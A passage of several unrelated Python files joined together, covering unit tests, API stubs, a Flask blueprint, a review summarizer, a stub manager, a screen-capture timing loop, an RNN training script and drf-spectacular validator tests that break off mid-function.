collecotr.py """ def test_expiration(self): ref = collector.AtomicRef(datetime.timedelta(seconds=10)) now = datetime.datetime.now() delta = datetime.timedelta(seconds=1) ref.set(1, now) self.assertEquals(1, ref.get(now)) self.assertEquals(1, ref.get(now - delta)) self.assertEquals(1, ref.get(now + delta)) self.assertEquals(1, ref.get(now + delta * 10)) self.assertEquals(None, ref.get(now + delta * 11)) self.assertEquals(1, ref.get(now + delta * 10)) ref.set(2, now + delta) self.assertEquals(2, ref.get(now)) self.assertEquals(2, ref.get(now + delta * 10)) self.assertEquals(2, ref.get(now + delta * 11)) self.assertEquals(None, ref.get(now + delta * 12)) if __name__ == '__main__': unittest.main()
import connexion import six from mcenter_server_api.models.ml_app_pattern import MLAppPattern # noqa: E501 from mcenter_server_api import util def onboarding_ml_app_patterns_get(): # noqa: E501 """Get list of all MLApp patterns # noqa: E501 :rtype: List[MLAppPattern] """ return 'do some magic!' def onboarding_ml_app_patterns_ml_app_pattern_id_delete(ml_app_pattern_id): # noqa: E501 """Delete an existing MLApp pattern # noqa: E501 :param ml_app_pattern_id: MLApp pattern identifier :type ml_app_pattern_id: str :rtype: None """ return 'do some magic!' def onboarding_ml_app_patterns_ml_app_pattern_id_get(ml_app_pattern_id): # noqa: E501 """Get specific MLApp pattern # noqa: E501 :param ml_app_pattern_id: MLApp pattern identifier :type ml_app_pattern_id: str :rtype: MLAppPattern """ return 'do some magic!' def onboarding_ml_app_patterns_ml_app_pattern_id_put(ml_app_pattern_id, ml_app_pattern): # noqa: E501 """Update an existing MLApp pattern # noqa: E501 :param ml_app_pattern_id: MLApp pattern identifier :type ml_app_pattern_id: str :param ml_app_pattern: MLApp pattern detail configuration :type ml_app_pattern: dict | bytes :rtype: MLAppPattern """ if connexion.request.is_json: ml_app_pattern = MLAppPattern.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def onboarding_ml_app_patterns_post(ml_app_pattern): # noqa: E501 """Create a new MLApp pattern # noqa: E501 :param ml_app_pattern: MLApp pattern detail description :type ml_app_pattern: dict | bytes :rtype: MLAppPattern """ if connexion.request.is_json: ml_app_pattern = MLAppPattern.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!'
import requests from requests.api import request req = requests.get('https://economia.awesomeapi.com.br/json/last/:moedas') #req = request.json() print(req)
# -*- coding: utf-8 -*- # # Copyright (C) 2021 GEO Secretariat. # # geo-knowledge-hub is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see LICENSE file for more # details. from flask import Blueprint from . import views def init_bp(app): bp = Blueprint("ageo_deposit_bp", __name__, template_folder="theme/templates") # registration bp.add_url_rule("/uploads", "ageo_deposit_search", views.geo_deposit_search) bp.add_url_rule("/uploads/new", "ageo_deposit_create", views.geo_deposit_create) bp.add_url_rule("/uploads/<pid_value>", "ageo_deposit_edit", views.geo_deposit_edit) bp.add_url_rule("/records/<pid_value>", "ageo_record_detail", views.geo_record_detail) app.register_blueprint(bp) __all__ = ( "init_bp" )
from nltk.corpus import stopwords from nltk import sent_tokenize, word_tokenize import heapq from preprocessor import PreProcessor class ReviewSummarizer: def generate_summary(self, review): pp = PreProcessor() formatted_text = pp.preprocess_review(review, True) sentences = sent_tokenize(review) word_frequencies = {} for word in word_tokenize(formatted_text): stop_words = set(stopwords.words('english')) if word not in stop_words: if word not in word_frequencies.keys(): word_frequencies[word] = 1 else: word_frequencies[word] += 1 maximum_frequency = max(word_frequencies.values()) for word in word_frequencies.keys(): word_frequencies[word] = (word_frequencies[word] / maximum_frequency) sentence_scores = {} for sent in sentences: for word in word_tokenize(sent.lower()): if word in word_frequencies.keys(): if len(sent.split(' ')) < 80: if sent not in sentence_scores.keys(): sentence_scores[sent] = word_frequencies[word] else: sentence_scores[sent] += word_frequencies[word] sent_summary = heapq.nlargest(2, sentence_scores, key=sentence_scores.get) summarized = ' '.join(sent_summary) return summarized def summarized_reviews(self, aspect_details): for aspect, detail in aspect_details.items(): for rev in detail.review_list.keys(): summarized_review = self.generate_summary(rev) rating = detail.review_list[rev] detail.review_summary[summarized_review] = rating return aspect_details
from __future__ import annotations import json from pathlib import Path from typing import Any, Iterator, NamedTuple, Sequence import astroid from ._contract import Category EXTENSION = '.json' ROOT = Path(__file__).parent / 'stubs' CPYTHON_ROOT = ROOT / 'cpython' class StubFile: __slots__ = ('path', '_content') path: Path _content: dict[str, dict[str, Any]] def __init__(self, path: Path) -> None: self.path = path self._content = dict() def load(self) -> None: with self.path.open(encoding='utf8') as stream: self._content = json.load(stream) def dump(self) -> None: if not self._content: return with self.path.open(mode='w', encoding='utf8') as stream: json.dump(obj=self._content, fp=stream, indent=2, sort_keys=True) def add(self, func: str, contract: Category, value: str) -> None: if contract not in (Category.RAISES, Category.HAS): raise ValueError('unsupported contract') contracts = self._content.setdefault(func, dict()) values = contracts.setdefault(contract.value, []) if value in values: return values.append(value) values.sort() def get(self, func: str, contract: Category) -> frozenset[str]: if contract not in (Category.RAISES, Category.HAS): raise ValueError('unsupported contract') values = self._content.get(func, {}).get(contract.value, []) return frozenset(values) class StubsManager: __slots__ = ('paths', '_modules') _modules: dict[str, StubFile] paths: tuple[Path, ...] default_paths = (ROOT, CPYTHON_ROOT) def __init__(self, paths: Sequence[Path] | None = None) -> None: self._modules = dict() if paths is None: self.paths = self.default_paths else: self.paths = tuple(paths) def read(self, *, path: Path, module_name: str | None = None) -> StubFile: if path.suffix == '.py': path = path.with_suffix(EXTENSION) if path.suffix != EXTENSION: raise ValueError(f'invalid stub file extension: *{path.suffix}') if module_name is None: module_name = self._get_module_name(path=path) if module_name not in self._modules: stub = StubFile(path=path) stub.load() self._modules[module_name] = stub return self._modules[module_name] @staticmethod def _get_module_name(path: Path) -> str: path = path.resolve() # walk up by the tree as pytest does if not (path.parent / '__init__.py').exists(): return path.stem for parent in path.parents: if not (parent / '__init__.py').exists(): parts = path.relative_to(parent).with_suffix('').parts return '.'.join(parts) raise RuntimeError('unreachable: __init__.py files up to root?') # pragma: no cover def get(self, module_name: str) -> StubFile | None: # cached stub = self._modules.get(module_name) if stub is not None: return stub # in the root for root in self.paths: path = root / (module_name + EXTENSION) if path.exists(): return self.read(path=path, module_name=module_name) path = root.joinpath(*module_name.split('.')).with_suffix(EXTENSION) if path.exists(): return self.read(path=path, module_name=module_name) return None def create(self, path: Path) -> StubFile: if path.suffix == '.py': path = path.with_suffix(EXTENSION) module_name = self._get_module_name(path=path) # if the stub for file is somewhere in the paths, use this instead. stub = self.get(module_name=module_name) if stub is not None: return stub # create new stub and load it from disk if the file exists stub = StubFile(path=path) if path.exists(): stub.load() self._modules[module_name] = stub return stub class PseudoFunc(NamedTuple): name: str body: list def _get_funcs(*, path: Path) -> Iterator[PseudoFunc]: text = path.read_text() tree = astroid.parse(code=text, path=str(path)) for expr in tree.body: yield from _get_funcs_from_expr(expr=expr) def _get_funcs_from_expr(expr, prefix: str = '') -> Iterator[PseudoFunc]: name = getattr(expr, 'name', '') if prefix: name = prefix + '.' + name # functions if type(expr) is astroid.FunctionDef: yield PseudoFunc(name=name, body=expr.body) if type(expr) is astroid.AsyncFunctionDef: yield PseudoFunc(name=name, body=expr.body) # methods if type(expr) is astroid.ClassDef: for subexpr in expr.body: yield from _get_funcs_from_expr(expr=subexpr, prefix=name) def generate_stub(*, path: Path, stubs: StubsManager | None = None) -> Path: from ._extractors import get_exceptions, get_markers if path.suffix != '.py': raise ValueError(f'invalid Python file extension: *{path.suffix}') if stubs is None: stubs = StubsManager() stub = stubs.create(path=path) for func in _get_funcs(path=path): for token in get_exceptions(body=func.body, stubs=stubs): value = token.value if isinstance(value, type): value = value.__name__ stub.add(func=func.name, contract=Category.RAISES, value=str(value)) for token in get_markers(body=func.body, stubs=stubs): assert token.marker is not None stub.add(func=func.name, contract=Category.HAS, value=token.marker) stub.dump() return stub.path
# Copyright (c) 2020, Huawei Technologies.All rights reserved. # # Licensed under the BSD 3-Clause License (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://opensource.org/licenses/BSD-3-Clause # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import torch import numpy as np import sys import copy from common_utils import TestCase, run_tests from common_device_type import dtypes, instantiate_device_type_tests from util_test import create_common_tensor class TestReciprocal(TestCase): def cpu_op_exec(self, input): output = torch.reciprocal(input) output = output.numpy() return output def npu_op_extc(self, input): output = torch.reciprocal(input) output = output.to("cpu") output = output.numpy() return output def test_reciprocal_common_shape_format(self, device): shape_format = [ [[np.float32, -1, (2, 2)]], [[np.float32, -1, (2, 2, 2)]], [[np.float32, -1, (2, 2, 2,5)]] ] for item in shape_format: cpu_input, npu_input = create_common_tensor(item[0], 1, 10) cpu_output = self.cpu_op_exec(cpu_input) npu_output = self.npu_op_extc(npu_input) self.assertRtolEqual(cpu_output, npu_output) def test_reciprocal_float16_shape_format(self, device): def cpu_op_exec_fp16(input): input = input.to(torch.float32) output = torch.reciprocal(input) output = output.numpy() output = output.astype(np.float16) return output shape_format = [ [[np.float16, -1, (2, 2)]], [[np.float16, -1, (2, 3, 5)]] ] for item in shape_format: cpu_input, npu_input = create_common_tensor(item[0], 1, 10) cpu_output = cpu_op_exec_fp16(cpu_input) npu_output = self.npu_op_extc(npu_input) self.assertRtolEqual(cpu_output, npu_output) instantiate_device_type_tests(TestReciprocal, globals(), except_for='cpu') if __name__ == "__main__": run_tests()
import numpy as np from cv2 import cv2 from mss import mss from PIL import Image import time init_time = last_time = time.time() count = 0 while 1: with mss() as sct: monitor = {'top': 40, 'left': 0, 'width': 800, 'height': 450} img = np.array(sct.grab(monitor)) print('Loop took {} seconds ' .format(time.time()-last_time)) count += 1 last_time = time.time() cv2.imshow('test', np.array(img)) if cv2.waitKey(25) & 0xFF == ord('q'): cv2.destroyAllWindows() break print('each loop took avg {} seconds ' .format((last_time-init_time)/count)) # A faster way using mss (Loop took about 0.06 seconds on my notebook instead of 0.10 seconds using ImageGrab) # mss: 16.7fps (capture BGR stream) # PIL.ImageGrab: 10.0fps (capture RGB stream) # below is a 'more faster way' (as the provider said) but causes error on my notebook # mon = {'top': 160, 'left': 160, 'width': 200, 'height': 200} # with mss() as sct: # while 1: # sct.get_pixels(mon) # img = Image.frombytes('RGB', (sct.width, sct.height), sct.image) # cv2.imshow('test', np.array(img)) # if cv2.waitKey(25) & 0xFF == ord('q'): # cv2.destroyAllWindows() # break
from tqdm import tqdm import numpy as np import random import itertools import json import time import torch from torch.autograd import Variable from torch.utils.data import DataLoader from rnn.data import DataIterator from rnn.model import EncoderRNN, DecoderRNN, Attention def train_model(w2v_model, epochs, output_size, datadir, savedir, cotraining_ratio=None, pretrain_epochs=None, pretraining_parameters=None, test_size=None, USE_CUDA=False): if pretrain_epochs and pretraining_parameters: raise ValueError('Both pretrain_epochs and pretraining_parameter arguments are given; ' 'at least one of them should be falsy.') print('Current time: {}'.format(time.strftime('%l:%M%p | %b %d'))) print('Loading data...', flush=True) # Load data data = {} for name in ('train', 'valid', 'test'): data[name] = DataIterator(dirname=datadir, w2v_model=w2v_model, dataset_name=name) if test_size: print("Loading data chunks of {}".format(test_size), flush=True) train_data_subset = list(itertools.islice(data['train'], test_size)) valid_data_subset = list(itertools.islice(data['valid'], test_size)) test_data_subset = list(itertools.islice(data['test'], test_size)) train_data = DataLoader(train_data_subset, num_workers=4, shuffle=True) valid_data = DataLoader(valid_data_subset, num_workers=4, shuffle=False) test_data = DataLoader(test_data_subset, num_workers=4, shuffle=False) else: train_data = DataLoader(list(data['train']), num_workers=4, shuffle=True) valid_data = DataLoader(list(data['valid']), num_workers=4, shuffle=False) test_data = DataLoader(list(data['test']), num_workers=4, shuffle=False) print('Finished loading data.') print('Subset lengths: {}, {}, {}'.format(len(train_data), len(valid_data), len(test_data)), flush=True) # Initialize model & training parameters teacher_forcing_ratio = 0.5 embedding_size = 300 rnn_hidden_size = 500 attn_hidden_size = 500 dropout_p = .3 lr = 1e-3 encoder = EncoderRNN(embedding_size, rnn_hidden_size, dropout_p=dropout_p) attn = Attention(rnn_hidden_size, attn_hidden_size, output_size) decoder = DecoderRNN(embedding_size + output_size, rnn_hidden_size, dropout_p=dropout_p) # Define loss criterion criterion = torch.nn.NLLLoss() if USE_CUDA: encoder = encoder.cuda() decoder = decoder.cuda() attn = attn.cuda() loss_means = [] accuracy_means = [] loss_save_interval = 1000 if pretrain_epochs: # Use separately initialized optimizers for pretraining encoder_optim = torch.optim.Adam(encoder.parameters(), lr=lr) decoder_optim = torch.optim.Adam(decoder.parameters(), lr=lr) attn_optim = torch.optim.Adam(attn.parameters(), lr=lr) optims = [encoder_optim, decoder_optim, attn_optim] for epoch in range(pretrain_epochs): print('\nPretraining epoch {}'.format(epoch + 1)) print('Current time: {}'.format(time.strftime('%l:%M%p | %b %d'))) # Set model to train mode encoder.train() decoder.train() attn.train() # Bookkeeping losses = [] loss_sum = 0 accuracy_sum = 0 accuracies = [] pbar = tqdm(train_data, total=len(train_data)) # Start training for iteration, (sentences, labels, textrank_labels) in enumerate(pbar): # Perform a train step loss, label_preds = train_step(sentences=sentences, labels=textrank_labels, encoder=encoder, decoder=decoder, attn=attn, optims=optims, criterion=criterion, teacher_forcing_ratio=teacher_forcing_ratio, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) accuracy_sum += accuracy losses.append(loss) loss_sum += loss mean_interval = 1000 if iteration <= mean_interval: pbar.set_postfix({'mean loss/accuracy': '{:.4f}, {:.4f}'.format(np.mean(losses), np.mean( accuracies))}) if iteration > mean_interval: pbar.set_postfix({'mean loss/accuracy (last {})'.format(mean_interval): '{:.4f}, {:.4f}'.format( np.mean(losses[-(mean_interval + 1):-1]), np.mean(accuracies[-(mean_interval + 1):-1]))}) if iteration % loss_save_interval == 0 and iteration != 0: loss_mean = loss_sum / loss_save_interval loss_means.append(loss_mean) accuracy_mean = accuracy_sum / loss_save_interval accuracy_means.append(accuracy_mean) loss_sum = 0 accuracy_sum = 0 tqdm.write('Train accuracy: {:.4f}\t\tTrain loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Set model to eval mode encoder.eval() decoder.eval() attn.eval() # Reset bookkeeping losses = [] accuracies = [] # Start evaluation on validation set for iteration, (sentences, labels, textrank_labels) in enumerate(valid_data): # Perform an eval step loss, label_preds = eval_step(sentences=sentences, labels=textrank_labels, encoder=encoder, decoder=decoder, attn=attn, criterion=criterion, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) losses.append(loss) tqdm.write( 'Validation accuracy: {:.4f}\tValidation loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Save ALL THE THINGS model_save_path = savedir + 'rnn_model_state_pretrain_epoch' + str((epoch + 1)) torch.save({ 'epoch': epoch + 1, 'final': False, 'enc_state_dict': encoder.state_dict(), 'dec_state_dict': decoder.state_dict(), 'att_state_dict': attn.state_dict(), 'optim_state_dicts': [optim.state_dict() for optim in optims] }, model_save_path) # Save losses/accuracies losses_accuracies = {'losses': loss_means, 'accuracies': accuracy_means} with open(savedir + 'loss_accuracy.json', 'w') as fh: json.dump(losses_accuracies, fh) print('Saved current model state & losses/accuracies.') # And now, for the real training: # If parameters from pretraining are given, load them into model if pretraining_parameters: print('Using parameters from pretraining.', flush=True) encoder.load_state_dict(pretraining_parameters['enc_state_dict']) decoder.load_state_dict(pretraining_parameters['dec_state_dict']) attn.load_state_dict(pretraining_parameters['att_state_dict']) # Always re-initialize the optimizers encoder_optim = torch.optim.Adam(encoder.parameters(), lr=lr) decoder_optim = torch.optim.Adam(decoder.parameters(), lr=lr) attn_optim = torch.optim.Adam(attn.parameters(), lr=lr) optims = [encoder_optim, decoder_optim, attn_optim] for epoch in range(epochs): print('\nEpoch {}'.format(epoch + 1)) print('Current time: {}'.format(time.strftime('%l:%M%p | %b %d'))) # Set model to train mode encoder.train() decoder.train() attn.train() # Bookkeeping losses = [] loss_sum = 0 accuracy_sum = 0 accuracies = [] pbar = tqdm(train_data, total=len(train_data)) # Start training for iteration, (sentences, labels, textrank_labels) in enumerate(pbar): # If a cotraining ratio is given, use textrank labels randomly according to ratio. if cotraining_ratio: use_textrank_labels = random.random() < cotraining_ratio if use_textrank_labels: labels = textrank_labels # Perform a train step loss, label_preds = train_step(sentences=sentences, labels=labels, encoder=encoder, decoder=decoder, attn=attn, optims=optims, criterion=criterion, teacher_forcing_ratio=teacher_forcing_ratio, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) accuracy_sum += accuracy losses.append(loss) loss_sum += loss mean_interval = 1000 if iteration <= mean_interval: pbar.set_postfix({'mean loss/accuracy': '{:.4f}, {:.4f}'.format(np.mean(losses), np.mean( accuracies))}) if iteration > mean_interval: pbar.set_postfix({'mean loss/accuracy (last {})'.format(mean_interval): '{:.4f}, {:.4f}'.format( np.mean(losses[-(mean_interval + 1):-1]), np.mean(accuracies[-(mean_interval + 1):-1]))}) if iteration % loss_save_interval == 0 and iteration != 0: loss_mean = loss_sum / loss_save_interval loss_means.append(loss_mean) accuracy_mean = accuracy_sum / loss_save_interval accuracy_means.append(accuracy_mean) loss_sum = 0 accuracy_sum = 0 tqdm.write('Train accuracy: {:.4f}\t\tTrain loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Set model to eval mode encoder.eval() decoder.eval() attn.eval() # Reset bookkeeping losses = [] accuracies = [] # Start evaluation on validation set for iteration, (sentences, labels, textrank_labels) in enumerate(valid_data): # Perform an eval step loss, label_preds = eval_step(sentences=sentences, labels=labels, encoder=encoder, decoder=decoder, attn=attn, criterion=criterion, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) losses.append(loss) tqdm.write('Validation accuracy: {:.4f}\tValidation loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) # Save ALL THE THINGS model_save_path = savedir + 'rnn_model_state_epoch' + str((epoch + 1)) torch.save({ 'epoch': epoch + 1, 'final': False, 'enc_state_dict': encoder.state_dict(), 'dec_state_dict': decoder.state_dict(), 'att_state_dict': attn.state_dict(), 'optim_state_dicts': [optim.state_dict() for optim in optims] }, model_save_path) # Save losses/accuracies losses_accuracies = {'losses': loss_means, 'accuracies': accuracy_means} with open(savedir + 'loss_accuracy.json', 'w') as fh: json.dump(losses_accuracies, fh) print('Saved current model state & losses/accuracies.') # Set model to eval mode encoder.eval() decoder.eval() attn.eval() # Reset bookkeeping losses = [] accuracies = [] # Start evaluation on validation set for iteration, (sentences, labels, textrank_labels) in enumerate(test_data): # Perform an eval step loss, label_preds = eval_step(sentences=sentences, labels=labels, encoder=encoder, decoder=decoder, attn=attn, criterion=criterion, output_size=output_size, USE_CUDA=USE_CUDA) accuracy = (label_preds == labels[0].numpy()).mean() accuracies.append(accuracy) losses.append(loss) print('\nTest accuracy: {:.4f}\t\tTest loss: {:.4f}'.format(np.mean(accuracies), np.mean(losses))) print('\nSaving final model state & losses/accuracies...') # Save ALL THE THINGS model_save_path = savedir + 'rnn_model_state_final' torch.save({ 'epoch': None, 'final': True, 'enc_state_dict': encoder.state_dict(), 'dec_state_dict': decoder.state_dict(), 'att_state_dict': attn.state_dict(), 'optim_state_dicts': [optim.state_dict() for optim in optims] }, model_save_path) # Save losses/accuracies losses_accuracies = {'losses': loss_means, 'accuracies': accuracy_means} with open(savedir + 'loss_accuracy.json', 'w') as fh: json.dump(losses_accuracies, fh) print('Finished saving!') print('Finish time: {}'.format(time.strftime('%l:%M%p | %b %d'))) def eval_step(sentences, labels, encoder, decoder, attn, criterion, output_size, USE_CUDA): # Turn x and y into Variables sentences = Variable(sentences, volatile=True).view(-1, sentences.size(2)) labels = Variable(torch.LongTensor(labels), volatile=True).view(-1) # Initialize zero vector BOD_vector = Variable(torch.zeros((1, 300))) # Initialize the label prediction as uniform ditribution over output dimensions label_pred = Variable(torch.FloatTensor([1] * output_size) / output_size).view(1, -1) # Initialize loss loss = Variable(torch.zeros(1)) if USE_CUDA: sentences = sentences.cuda() labels = labels.cuda() label_pred = label_pred.cuda() loss = loss.cuda() BOD_vector = BOD_vector.cuda() encoder_outputs, encoder_hidden = encoder(sentences) decoder_hidden = encoder_hidden # For decoding, add the beginning-of-document vector (which is for now just the 0-vector) to the sequence sentences = torch.cat((BOD_vector, sentences), 0) label_preds = np.zeros((len(encoder_outputs))).astype(int) # Now we iterate over the decoder steps # For evaluation, we do not use teacher forcing for i, decoding_step in enumerate(encoder_outputs): output, decoder_hidden = decoder(label_pred, sentences[i], decoder_hidden) label_pred, output = attn(output, encoder_outputs[i]) loss += criterion(output, labels[i]) label_preds[i] = label_pred.max(-1)[1].data[0] # Compute mean loss loss /= len(encoder_outputs) return loss.data[0], label_preds def train_step(sentences, labels, encoder, decoder, attn, optims, criterion, teacher_forcing_ratio, output_size, USE_CUDA): # Turn x and y into Variables sentences = Variable(sentences).view(-1, sentences.size(2)) labels = Variable(torch.LongTensor(labels)).view(-1) # Make labels one-hot and append 0-label, for teacher forcing input label_list = labels.data.numpy() true_labels = np.zeros((len(label_list), output_size)) true_labels[np.arange(len(label_list)), label_list] = 1 # Append initial dummy label (= uniform distribution) first_label = np.array([1] * output_size) / output_size true_labels = np.vstack((first_label, true_labels)) # Make true labels a Variable true_labels = Variable(torch.from_numpy(true_labels).float()).view(-1, 1, output_size) # Initialize zero vector BOD_vector = Variable(torch.zeros((1, 300))) # Initialize the label prediction as uniform ditribution over output dimensions label_pred = Variable(torch.FloatTensor([1] * output_size) / output_size).view(1, -1) # Initialize loss loss = Variable(torch.zeros(1)) if USE_CUDA: sentences = sentences.cuda() labels = labels.cuda() label_pred = label_pred.cuda() loss = loss.cuda() BOD_vector = BOD_vector.cuda() true_labels = true_labels.cuda() # Reset gradients for optim in optims: optim.zero_grad() encoder_outputs, encoder_hidden = encoder(sentences) decoder_hidden = encoder_hidden # For decoding, add the beginning-of-document vector (which is for now just the 0-vector) to the sequence sentences = torch.cat((BOD_vector, sentences), 0) label_preds = np.zeros((len(encoder_outputs))).astype(int) # Now we iterate over the decoder steps for i, decoding_step in enumerate(encoder_outputs): # Decide whether predicted or true labels are used use_teacher_forcing = random.random() < teacher_forcing_ratio if use_teacher_forcing: output, decoder_hidden = decoder(true_labels[i], sentences[i], decoder_hidden) else: output, decoder_hidden = decoder(label_pred, sentences[i], decoder_hidden) label_pred, output = attn(output, encoder_outputs[i]) loss += criterion(output, labels[i]) label_preds[i] = label_pred.max(-1)[1].data[0] # Compute mean loss loss /= len(encoder_outputs) loss.backward() # Clip gradients, just to be sure clip = 5 torch.nn.utils.clip_grad_norm(encoder.parameters(), clip) torch.nn.utils.clip_grad_norm(decoder.parameters(), clip) torch.nn.utils.clip_grad_norm(attn.parameters(), clip) # Run optimization step for optim in optims: optim.step() return loss.data[0], label_preds
import sys from datetime import timedelta from unittest import mock import pytest from django.contrib.auth import validators as auth_validators from django.contrib.postgres import validators as postgres_validators from django.core import validators from django.urls import path from rest_framework import serializers from rest_framework.decorators import api_view from drf_spectacular.utils import extend_schema from tests import assert_schema, generate_schema @mock.patch('rest_framework.settings.api_settings.COERCE_DECIMAL_TO_STRING', False) def test_validators(): class XSerializer(serializers.Serializer): # Note that these fields intentionally use basic field types to ensure that we detect from the validator only. # The following only apply for `string` type: char_email = serializers.CharField(validators=[validators.EmailValidator()]) char_url = serializers.CharField(validators=[validators.URLValidator()]) char_regex = serializers.CharField(validators=[validators.RegexValidator(r'\w+')]) char_max_length = serializers.CharField(validators=[validators.MaxLengthValidator(200)]) char_min_length = serializers.CharField(validators=[validators.MinLengthValidator(100)]) # The following only apply for `integer` and `number` types: float_max_value = serializers.FloatField(validators=[validators.MaxValueValidator(200.0)]) float_min_value = serializers.FloatField(validators=[validators.MinValueValidator(100.0)]) float_decimal = serializers.FloatField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) integer_max_value = serializers.IntegerField(validators=[validators.MaxValueValidator(200)]) integer_min_value = serializers.IntegerField(validators=[validators.MinValueValidator(100)]) integer_decimal = serializers.FloatField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) decimal_max_value = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MaxValueValidator(200)], ) decimal_min_value = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MinValueValidator(100)], ) decimal_decimal = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # The following only apply for `array` type: list_max_length = serializers.ListField(validators=[validators.MaxLengthValidator(200)]) list_min_length = serializers.ListField(validators=[validators.MinLengthValidator(100)]) # The following only apply for `object` type: dict_max_length = serializers.DictField(validators=[validators.MaxLengthValidator(200)]) dict_min_length = serializers.DictField(validators=[validators.MinLengthValidator(100)]) # Explicit test for rest_framework.fields.DurationField: age = serializers.DurationField(validators=[ validators.RegexValidator(r'^P\d+Y$'), validators.MaxLengthValidator(5), validators.MinLengthValidator(3), ]) # Tests for additional subclasses already handled by their superclass: array_max_length = serializers.ListField(validators=[postgres_validators.ArrayMaxLengthValidator(200)]) array_min_length = serializers.ListField(validators=[postgres_validators.ArrayMinLengthValidator(100)]) ascii_username = serializers.CharField(validators=[auth_validators.ASCIIUsernameValidator()]) unicode_username = serializers.CharField(validators=[auth_validators.UnicodeUsernameValidator()]) file_extension = serializers.CharField(validators=[validators.FileExtensionValidator(['.jpg', '.png'])]) integer_string = serializers.CharField(validators=[validators.integer_validator]) integer_list = serializers.CharField(validators=[validators.validate_comma_separated_integer_list]) class YSerializer(serializers.Serializer): # These validators are unsupported for the `string` type: char_max_value = serializers.CharField(validators=[validators.MaxValueValidator(200)]) char_min_value = serializers.CharField(validators=[validators.MinValueValidator(100)]) char_decimal = serializers.CharField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # These validators are unsupported for the `integer` and `number` types: float_email = serializers.FloatField(validators=[validators.EmailValidator()]) float_url = serializers.FloatField(validators=[validators.URLValidator()]) float_regex = serializers.FloatField(validators=[validators.RegexValidator(r'\w+')]) float_max_length = serializers.FloatField(validators=[validators.MaxLengthValidator(200)]) float_min_length = serializers.FloatField(validators=[validators.MinLengthValidator(100)]) integer_email = serializers.IntegerField(validators=[validators.EmailValidator()]) integer_url = serializers.IntegerField(validators=[validators.URLValidator()]) integer_regex = serializers.IntegerField(validators=[validators.RegexValidator(r'\w+')]) integer_max_length = serializers.IntegerField(validators=[validators.MaxLengthValidator(200)]) integer_min_length = serializers.IntegerField(validators=[validators.MinLengthValidator(100)]) decimal_email = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.EmailValidator()], ) decimal_url = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.URLValidator()], ) decimal_regex = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.RegexValidator(r'\w+')], ) decimal_max_length = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MaxLengthValidator(200)], ) decimal_min_length = serializers.DecimalField( max_digits=4, decimal_places=1, validators=[validators.MinLengthValidator(100)], ) # These validators are unsupported for the `array` type: list_email = serializers.ListField(validators=[validators.EmailValidator()]) list_url = serializers.ListField(validators=[validators.URLValidator()]) list_regex = serializers.ListField(validators=[validators.RegexValidator(r'\w+')]) list_max_value = serializers.ListField(validators=[validators.MaxValueValidator(200)]) list_min_value = serializers.ListField(validators=[validators.MinValueValidator(100)]) list_decimal = serializers.ListField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # These validators are unsupported for the `object` type: dict_email = serializers.DictField(validators=[validators.EmailValidator()]) dict_url = serializers.DictField(validators=[validators.URLValidator()]) dict_regex = serializers.DictField(validators=[validators.RegexValidator(r'\w+')]) dict_max_value = serializers.DictField(validators=[validators.MaxValueValidator(200)]) dict_min_value = serializers.DictField(validators=[validators.MinValueValidator(100)]) dict_decimal = serializers.DictField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # These validators are unsupported for the `boolean` type: boolean_email = serializers.BooleanField(validators=[validators.EmailValidator()]) boolean_url = serializers.BooleanField(validators=[validators.URLValidator()]) boolean_regex = serializers.BooleanField(validators=[validators.RegexValidator(r'\w+')]) boolean_max_length = serializers.BooleanField(validators=[validators.MaxLengthValidator(200)]) boolean_min_length = serializers.BooleanField(validators=[validators.MinLengthValidator(100)]) boolean_max_value = serializers.BooleanField(validators=[validators.MaxValueValidator(200)]) boolean_min_value = serializers.BooleanField(validators=[validators.MinValueValidator(100)]) boolean_decimal = serializers.BooleanField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) # Explicit test for rest_framework.fields.DurationField: duration_max_value = serializers.DurationField(validators=[validators.MaxValueValidator(200)]) duration_min_value = serializers.DurationField(validators=[validators.MinValueValidator(100)]) duration_decimal = serializers.DurationField( validators=[validators.DecimalValidator(max_digits=4, decimal_places=2)], ) @extend_schema(request=XSerializer, responses=XSerializer) @api_view(['POST']) def view_func_x(request, format=None): pass # pragma: no cover @extend_schema(request=YSerializer, responses=YSerializer) @api_view(['POST']) def view_func_y(request, format=None): pass # pragma: no cover schema = generate_schema(None, patterns=[path('x', view_func_x), path('y', view_func_y)]) if sys.version_info < (3, 7): # In Python < 3.7, re.escape() escapes more characters than necessary. field = schema['components']['schemas']['X']['properties']['integer_list'] field['pattern'] = field['pattern'].replace(r'\,', ',') assert_schema(schema, 'tests/test_validators.yml') def test_nested_validators(): class XSerializer(serializers.Serializer): list_field = serializers.ListField( child=serializers.IntegerField( 